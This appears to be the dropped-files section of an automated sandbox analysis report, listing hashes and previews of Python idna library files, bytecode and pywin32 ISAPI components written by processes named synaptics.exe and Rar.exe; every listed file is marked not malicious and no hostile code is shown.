                                                                                                                                                                                      Preview:from .core import (. IDNABidiError,. IDNAError,. InvalidCodepoint,. InvalidCodepointContext,. alabel,. check_bidi,. check_hyphen_ok,. check_initial_combiner,. check_label,. check_nfc,. decode,. encode,. ulabel,. uts46_remap,. valid_contextj,. valid_contexto,. valid_label_length,. valid_string_length,.).from .intranges import intranges_contain.from .package_data import __version__..__all__ = [. "__version__",. "IDNABidiError",. "IDNAError",. "InvalidCodepoint",. "InvalidCodepointContext",. "alabel",. "check_bidi",. "check_hyphen_ok",. "check_initial_combiner",. "check_label",. "check_nfc",. "decode",. "encode",. "intranges_contain",. "ulabel",. "uts46_remap",. "valid_contextj",. "valid_contexto",. "valid_label_length",. "valid_string_length",.].
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):820
                                                                                                                                                                                      Entropy (8bit):5.105060865619361
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CSCSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/C+Vlyzx5:pijeXL/whvOcAdtOb8fcjOb897g
                                                                                                                                                                                      MD5:992F897492FD29277FB10EC9B4358526
                                                                                                                                                                                      SHA1:41A00693E4644B3C64FBD1B88381A7170C16CAF2
                                                                                                                                                                                      SHA-256:376CDF3C2ECADAC9358C9C28235C7C154F50378FD229067F5977DD017D534058
                                                                                                                                                                                      SHA-512:2A20F4D89D35303E2248D4435F684E7AEC73A36A86F716798997F949DB2291309831F27E0003FBD38A25D77147B378561202AC9ADC81C4AD1AED55988B26000D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....?C:\Users\Public\QExvbmVOb25l\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9917
                                                                                                                                                                                      Entropy (8bit):5.446833464521934
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:NePGIILf6b4+bMh9t5uszP0M7Bhu5XCwY2uVNnaMWT/czpko:cPpIF+bMPt5usb1h0XFY2ubnUbQ
                                                                                                                                                                                      MD5:63AD381C030C6C1315A83E82BD39A6EA
                                                                                                                                                                                      SHA1:D669D720FE2035444E9C136BE83956A493A1C2DA
                                                                                                                                                                                      SHA-256:AD2032912A8FD88E630E4982D90F4E9A3E5D82ECB0606FA389F99BEEF22501E6
                                                                                                                                                                                      SHA-512:F2EEC130E81CA603C2585CC69F85FC0237F93BCD87B7131BB54BAC3BFBA433BBDFEB69F93101A5121D77A218B493C61C66198D7DD36DAB7985D319DE34E25D62
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fR5.......................@...sj...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d ..Z.d.e.e.e.f...d!e.d.e.f.d"d#..Z.dFd.e.d%e.d.e.f.d&d'..Z.d.e.d.e.f.d(d)..Z.d.e.d.e.f.d*d+..Z d.e.d.d.f.d,d-..Z!d.e.d.e.d.e.f.d/d0..Z"dFd.e.d.e.d1e.d.e.f.d2d3..Z#d.e.e.e.e$f...d.d.f.d4d5..Z%d.e.d.e.f.d6d7..Z&d.e.e.e.e$f...d.e.f.d8d9..Z'dGd;e.d<e.d=e.d.e.f.d>d?..Z(.$.$.$.$dHd.e.e.e.e$f...d@e.dAe.d<e.d=e.d.e.f.dBdC..Z).$.$.$dId.e.e.e.e$f...d@e.dAe.d<e.d.e.f.dDdE..Z*d.S.)J.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....])%.0....1....2....3....4....5....6....7....8....9...._....a....b....c....d....e....f....g....h....i....j....k....l....m....n....o....p....q....r....s....t....u....v....w....x....y....z...c....................@........e.Z.d.Z.d.Z.d.S.)...IDN
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):198619
                                                                                                                                                                                      Entropy (8bit):3.520914545089092
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:PIS0p2ZbbO4g3aD8yynBXLD4RoC2Mo+4S+s8ecqmUM2UK+QQeky22ImSsEgYtqWy:P621S458yys
                                                                                                                                                                                      MD5:8A84F839B282549F777EB57750D669D1
                                                                                                                                                                                      SHA1:ACBE9BF8349006D81B40722B126630707A753E53
                                                                                                                                                                                      SHA-256:B29AA4E439910BF86E3017F53A89539A58C82634A967C6F0921C2E698A0C0EA9
                                                                                                                                                                                      SHA-512:1224B35C7E7BA4CC8268E506DC8EF7D667B64FCC367F2085B269E969EA676C8C19FB9A21CDF5ADC9670DFAC3226525A45D878801DE83141D81C2E3E5824910AF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.7.......................@...s.]..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1952
                                                                                                                                                                                      Entropy (8bit):5.309293995361254
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:DrDo6itCRy/ORh72cN+Rl/99X7iEvR9Bn:Drc7kR2cNC/9t7jvN
                                                                                                                                                                                      MD5:744C0DC26990A3C0EEE1ECD63613FB60
                                                                                                                                                                                      SHA1:CBF5329BCA22BB910EADC76C6ED058AFC78B55FB
                                                                                                                                                                                      SHA-256:2F48183F56A5C5A0BE8B9402EB6423E910F4BD42C85EC9D6745BA8226749D6BF
                                                                                                                                                                                      SHA-512:B704FCE6B2458878550EFC01209963D737F16FB3AEF6D8453094CA3968B66E75E5616C07592C5879AA9224F143CA60024C942FC41C3BF26CCDECE9928AA9BE30
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..fj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                      Entropy (8bit):4.861282357369582
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/BAauletxbkCoeJ/Lt/lPlXaHF50YTlHX0M9VWrzSBw5JOmIOt2TgN:y/rqetGCow53aHxEM9ArmBw5Ampt2s
                                                                                                                                                                                      MD5:C9249CAD98D4B69C0B01BAF12AADB91B
                                                                                                                                                                                      SHA1:57EC9C5ED69FE0C0E06E5C32F95F701EED00DE72
                                                                                                                                                                                      SHA-256:A2FCFE4DF00031E1952B78F20ACD38FD58011922F0C5914287A02EF28D20A45D
                                                                                                                                                                                      SHA-512:019952CF71BA8AEF14E254F97F22D7CAB87B5AEA4FB733EC32124A6AA3E4CAD118EF3D2AAF9118CBA4E6A343C1673ED87F6D01AE2CD9898EBC1FE087A019F3F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......>..f.........................@...s....d.Z.d.S.).z.3.9N)...__version__..r....r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3422
                                                                                                                                                                                      Entropy (8bit):4.317350903066924
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Ej6Q796QeYUV+K6QZ7cgGlFi2Wa696Q+CFLcg2lFiIDnGvqvdm/WHqSJv:6/9CYUV1t7zGfihH9tLz2fiHiFdqSh
                                                                                                                                                                                      MD5:ABCF05AEC6DB6B1DCEF409433F57FCD2
                                                                                                                                                                                      SHA1:C326EA0E90CD4AD5638AB0C33A649080C002CEF3
                                                                                                                                                                                      SHA-256:3C47B0DC8B70CE35B887299B6AC9EDCB6376397BCD7201C1F898EB06EC473D86
                                                                                                                                                                                      SHA-512:7CE10E54C449901D0A092CD657AD7870FE8B72BB9654313715AC440D83709BE675B1016FDCB606F84D0B31410DA31CE81EDF995FE3481DEC924DB38AFCA79BF7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import codecs.import re.from typing import Any, Optional, Tuple..from .core import IDNAError, alabel, decode, encode, ulabel.._unicode_dots_re = re.compile("[\u002e\u3002\uff0e\uff61]")...class Codec(codecs.Codec):. def encode(self, data: str, errors: str = "strict") -> Tuple[bytes, int]:. if errors != "strict":. raise IDNAError('Unsupported error handling "{}"'.format(errors)).. if not data:. return b"", 0.. return encode(data), len(data).. def decode(self, data: bytes, errors: str = "strict") -> Tuple[str, int]:. if errors != "strict":. raise IDNAError('Unsupported error handling "{}"'.format(errors)).. if not data:. return "", 0.. return decode(data), len(data)...class IncrementalEncoder(codecs.BufferedIncrementalEncoder):. def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[bytes, int]:. if errors != "strict":. raise IDNAError('Unsupported error handli
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):316
                                                                                                                                                                                      Entropy (8bit):4.675723792199159
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYBFibXKGcQF6c8bNdPl6rZ9vUPLqBAII6A0vURy6QyneAJFHkwIDO:1REYBh618vPl6FCzTIL8Ry6fnbHIDO
                                                                                                                                                                                      MD5:481871CD052957124183A01FED88B799
                                                                                                                                                                                      SHA1:B422D026EFA3D16AEEB49683D2CC3CD62C26BBC1
                                                                                                                                                                                      SHA-256:4732F2E90402765F7BF3868585BD845FD10A1822638343F73E294675E5D7731F
                                                                                                                                                                                      SHA-512:C37ADAC2C04F58FE0EE9A1915EAA809050CA40B2008CFCF13124F76973D0725DC61D1EE59FD2A883BBD5CFE3C09A2DA782C9D1F1042641E35ACAC4C95EF416A5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Any, Union..from .core import decode, encode...def ToASCII(label: str) -> bytes:. return encode(label)...def ToUnicode(label: Union[bytes, bytearray]) -> str:. return decode(label)...def nameprep(s: Any) -> None:. raise NotImplementedError("IDNA 2008 does not utilise nameprep protocol").
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13650
                                                                                                                                                                                      Entropy (8bit):4.46864061978377
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:xdqxD3m5oyqUN+Mt8rOrhNZjGs3Le+yrYfpR0cy1YQ7Up9uusBAgfwNKCx04SfSC:+iN/3Le+yrY/0j1YQUz+BHfOmfSC
                                                                                                                                                                                      MD5:1AC8E75205145E83F27AF5E0A6C6A9EC
                                                                                                                                                                                      SHA1:A29FFD855B5E2D971A25672E3043A1EB396FC3EB
                                                                                                                                                                                      SHA-256:020D34602B8B6C8AD3BFBBA472E8F85CB68B63FC327810B3E67BBDAF6FC3DEE8
                                                                                                                                                                                      SHA-512:38B3DD96ADD4CFB430C3D15AFE6A562B50CFD109495756C15E3C98758410CE084315AFF5B92CF5490C433F1BF04F56060605A6786B22AACB12A6AB45C1868AD2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import bisect.import re.import unicodedata.from typing import Optional, Union..from . import idnadata.from .intranges import intranges_contain.._virama_combining_class = 9._alabel_prefix = b"xn--"._unicode_dots_re = re.compile("[\u002e\u3002\uff0e\uff61]")._ldh = (. 48,. 49,. 50,. 51,. 52,. 53,. 54,. 55,. 56,. 57,. 95,. 97,. 98,. 99,. 100,. 101,. 102,. 103,. 104,. 105,. 106,. 107,. 108,. 109,. 110,. 111,. 112,. 113,. 114,. 115,. 116,. 117,. 118,. 119,. 120,. 121,. 122,.)...class IDNAError(UnicodeError):. """Base exception for all IDNA-encoding related problems""".. pass...class IDNABidiError(IDNAError):. """Exception when bidirectional requirements are not satisfied""".. pass...class InvalidCodepoint(IDNAError):. """Exception when a disallowed or unallocated codepoint is used""".. pass...class InvalidCodepointContext(IDNAError):. """Exception when the code
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):79623
                                                                                                                                                                                      Entropy (8bit):3.5629144753775273
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:9IFeZ8ek6rfUqCzfQnyUgMtsbruOz/yKae9hLXnoFDuZNBrVk+4VjIN:Dh3Uryyc6/MtF+T
                                                                                                                                                                                      MD5:4B8AB107F7FD8DD839534F15B0722957
                                                                                                                                                                                      SHA1:799F552EE255887C6E8504FCF6559CFCDF5B0C8B
                                                                                                                                                                                      SHA-256:486F2385A184E778A20FA078F69B76A704EFFD4BC295C89613E379E28476A785
                                                                                                                                                                                      SHA-512:C5E9ABFA9F900162EBA5E25D532508E7845AC1A33C679783A4AAFA094F5D88CC33BB02A353C95EFF1395F76BFB1EF93BB8E07543D3865CC6520248F313FFC1A4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This file is automatically generated by tools/idna-data..__version__ = "16.0.0"..scripts = {. "Greek": (. 0x37000000374,. 0x37500000378,. 0x37A0000037E,. 0x37F00000380,. 0x38400000385,. 0x38600000387,. 0x3880000038B,. 0x38C0000038D,. 0x38E000003A2,. 0x3A3000003E2,. 0x3F000000400,. 0x1D2600001D2B,. 0x1D5D00001D62,. 0x1D6600001D6B,. 0x1DBF00001DC0,. 0x1F0000001F16,. 0x1F1800001F1E,. 0x1F2000001F46,. 0x1F4800001F4E,. 0x1F5000001F58,. 0x1F5900001F5A,. 0x1F5B00001F5C,. 0x1F5D00001F5E,. 0x1F5F00001F7E,. 0x1F8000001FB5,. 0x1FB600001FC5,. 0x1FC600001FD4,. 0x1FD600001FDC,. 0x1FDD00001FF0,. 0x1FF200001FF5,. 0x1FF600001FFF,. 0x212600002127,. 0xAB650000AB66,. 0x101400001018F,. 0x101A0000101A1,. 0x1D2000001D246,. ),. "Han": (. 0x2E80
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                      Entropy (8bit):4.518518430134968
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:wicNAdy/ORhzgncCbZOvyp1NGq6vbqgCbHmgXikyXP:pcG5YcCI01NGq6mgCbHmYPy/
                                                                                                                                                                                      MD5:1B295D1420A220F7472FBE79EC1EB0C1
                                                                                                                                                                                      SHA1:6EAA004ADE4EE81378C86CEC87646DFF617BE72F
                                                                                                                                                                                      SHA-256:6A652D91D8587101BC66BF82A0C33F91545A731922BC2D568313756FADCA29D5
                                                                                                                                                                                      SHA-512:C11A52A64C46848780AAC49C2D6B61A4EBD6EC771198C8C470A3624BE7C8A9D2A8D7D9D3CAE90761A1EA75EDB867716FEE99C6409DBB91FBF74809EFB3E8800A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).."""..import bisect.from typing import List, Tuple...def intranges_from_list(list_: List[int]) -> Tuple[int, ...]:. """Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. """.. sorted_list = sorted(list_). ranges = []. last_write = -1. for i in range(len(sorted_list)):. if i + 1 < len(sorted_list):. if sorted_list[i] == sorted_list[i + 1] - 1:. continue. current_range = sorted_list[last_write + 1 : i + 1]. ranges.append(_encode_range(cu
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20
                                                                                                                                                                                      Entropy (8bit):3.721928094887362
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:cvycP:8yI
                                                                                                                                                                                      MD5:825C8CE5BF6CC089E5988E4E035D3025
                                                                                                                                                                                      SHA1:58AA4F470ED582C69BFAD374B73471A2FB104506
                                                                                                                                                                                      SHA-256:083F3DB50E23E8E03C9A92B8EA8F285CDB300FCB9DAF100703E6D89BCE0BA86A
                                                                                                                                                                                      SHA-512:1B5914D72DFCAE9B728FAED20A6BE5AC09C5E912A38BD217222FF3CF94BFFAD64A5276000C3C3BFC2BB77D36D1F4516885720DCA9635E8A228078A798C51C0D5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:__version__ = "3.9".
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):243725
                                                                                                                                                                                      Entropy (8bit):4.1357991782001235
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:a6xg7TWvNYBbPeVGKUJ8O8ng4Ynayk7z8:y
                                                                                                                                                                                      MD5:BBAB719EA019C119FAF2E55A59FD2C9D
                                                                                                                                                                                      SHA1:42C7CB4CD36A68FF4B1712A961B6B3845C1A1122
                                                                                                                                                                                      SHA-256:1FD277E55903D05F4BF6628EAA378D19DD80F956BA1653E8CFA273E0AEE1FA9B
                                                                                                                                                                                      SHA-512:533DFC39CD088A2DB67B9B2BF6AC13195A8670C9D0898797AB508DDB1DEB1F04D411F1C86F3ED3C7E5C69822689947B057170C1AED365A04BBFDC41354035F59
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This file is automatically generated by tools/idna-data.# vim: set fileencoding=utf-8 :..from typing import List, Tuple, Union.."""IDNA Mapping Table from UTS46."""...__version__ = "16.0.0"...def _seg_0() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]:. return [. (0x0, "V"),. (0x1, "V"),. (0x2, "V"),. (0x3, "V"),. (0x4, "V"),. (0x5, "V"),. (0x6, "V"),. (0x7, "V"),. (0x8, "V"),. (0x9, "V"),. (0xA, "V"),. (0xB, "V"),. (0xC, "V"),. (0xD, "V"),. (0xE, "V"),. (0xF, "V"),. (0x10, "V"),. (0x11, "V"),. (0x12, "V"),. (0x13, "V"),. (0x14, "V"),. (0x15, "V"),. (0x16, "V"),. (0x17, "V"),. (0x18, "V"),. (0x19, "V"),. (0x1A, "V"),. (0x1B, "V"),. (0x1C, "V"),. (0x1D, "V"),. (0x1E, "V"),. (0x1F, "V"),. (0x20, "V"),. (0x21, "V"),. (0x22, "V"),.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):54272
                                                                                                                                                                                      Entropy (8bit):6.148775813397798
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:NJG3XLZ6PgxGlDboKh2wuHXDHopF4zk01s5YcCuzOVn1eo:NJoCBCuzOVn1e
                                                                                                                                                                                      MD5:43FAA16056FBA69EEF1B052D715FA46F
                                                                                                                                                                                      SHA1:D1EB4D1604B828DF78436E431B1B676D6E63C404
                                                                                                                                                                                      SHA-256:96F3F828DCF671DBB24B3B52C20DF990954A77E636A3DE77BF35E4A041B52F89
                                                                                                                                                                                      SHA-512:18D4E891EEF5CF70757946A67CD77186BE2723407F7EAC86D2A2A4CC4A13F29BA0F19B6830944C9FB8FBE0315CD1A6A27F534840966C05857FED8CDB3F3F0E92
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."..hLI.hLI.hLI...I.hLI..MH.hLI...I.hLI..IH.hLI..HH.hLI..OH.hLIV.MH.hLI..MH.hLI.hMI.hLI0.EH.hLI0.LH.hLI0..I.hLI0.NH.hLIRich.hLI........PE..L...,..d...........!.....~...R............................................................@.....................................................................`...(...T...............................@............................................text...\}.......~.................. ..`.rdata...........0..................@..@.data...............................@....rsrc...............................@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1228
                                                                                                                                                                                      Entropy (8bit):4.499657925503658
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:RlKrjxtACEOd/YACnNSwoKtTWxNm5b8WqAuvKMJbK:RErjxtj/Cjo4Tw+b8XAnkbK
                                                                                                                                                                                      MD5:376B863A5D71D683CE42E07F90E31D70
                                                                                                                                                                                      SHA1:0B352BA4DC53F35EB4F0AB2A59F1033791193013
                                                                                                                                                                                      SHA-256:2566CAC7219E2D93BF8AB966F9542247307450FF213A4FE1C115635774ABF310
                                                                                                                                                                                      SHA-512:81BF1BBFCF88ED20EE020B0D555DD96FE7E19F165C1D222A311E717AE1A189223BA7ABABAF774CDEB91C4C1C84B1BCE5063FABDBBEDE8FE8B15D9E9F8E560C73
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# The Python ISAPI package....# Exceptions thrown by the DLL framework..class ISAPIError(Exception):. def __init__(self, errno, strerror=None, funcname=None):. # named attributes match IOError etc.. self.errno = errno. self.strerror = strerror. self.funcname = funcname. Exception.__init__(self, errno, strerror, funcname).. def __str__(self):. if self.strerror is None:. try:. import win32api.. self.strerror = win32api.FormatMessage(self.errno).strip(). except:. self.strerror = "no error message is available". # str() looks like a win32api error.. return str((self.errno, self.strerror, self.funcname))...class FilterError(ISAPIError):. pass...class ExtensionError(ISAPIError):. pass...# A little development aid - a filter or extension callback function can.# raise one of these exceptions, and the handler module will be reloaded..# This means you can change
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4160
                                                                                                                                                                                      Entropy (8bit):4.872533696011899
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:6AJQczz0jdpALt4DVI6HVt6Lu90PYC7drlFDeiI97qqUFXB6wpe3f04p:6hLVt6NQCxiihXMwcv04p
                                                                                                                                                                                      MD5:F7697BC2AEAE59A9BEDFABD3192E80FF
                                                                                                                                                                                      SHA1:BB4B1E7F5F7626F2F3DC2490931355658A6212D9
                                                                                                                                                                                      SHA-256:0B67CC1EF06CCFD881C29DA61C775C52B634C7BCA1EAB5B19AC2A1685B0164EE
                                                                                                                                                                                      SHA-512:06C654ED9EEE02BE94ED3FE7BB10E22A878EFCDE089916DECE2B4A305A27E7CC26FD743C31F43038AE87AB7AD1F93848E5499DF4AEC85254651833384AE585A1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: NOTE: This HTML is displayed inside the CHM file - hence some hrefs. will only work in that environment.-->.<HTML>.<BODY>.<TITLE>Introduction to Python ISAPI support</TITLE>..<h2>Introduction to Python ISAPI support</h2>..<h3>See also</h3>.<ul>. <li><a href="/isapi_modules.html">The isapi related modules</a>. </li>. <li><a href="/isapi_objects.html">The isapi related objects</a>. </li>.</ul>.<p><i>Note: if you are viewing this documentation directly from disk, .most links in this document will fail - you can also find this document in the.CHM file that comes with pywin32, where the links will work</i>..<h3>Introduction</h3>.This documents Python support for hosting ISAPI exensions and filters inside.Microsoft Internet Information Server (IIS). It assumes a basic understanding .of the ISAPI filter and extension mechanism..<p>.In summary, to implement a filter or extension, you provide a Python module.which defines a Filter and/or Extension class. Once your class ha
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):27548
                                                                                                                                                                                      Entropy (8bit):4.80049866836599
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:hJYoQ+eiFRdjkLsgNUN5+E1pLYZgz2IvGc1d7NenkZ39NMm3XhKL7/Qtuja3IqL3:hJYB+dEZgfd7jnhKL7Lj8
                                                                                                                                                                                      MD5:EEAACC07EF7A57FC7B89F22229302A20
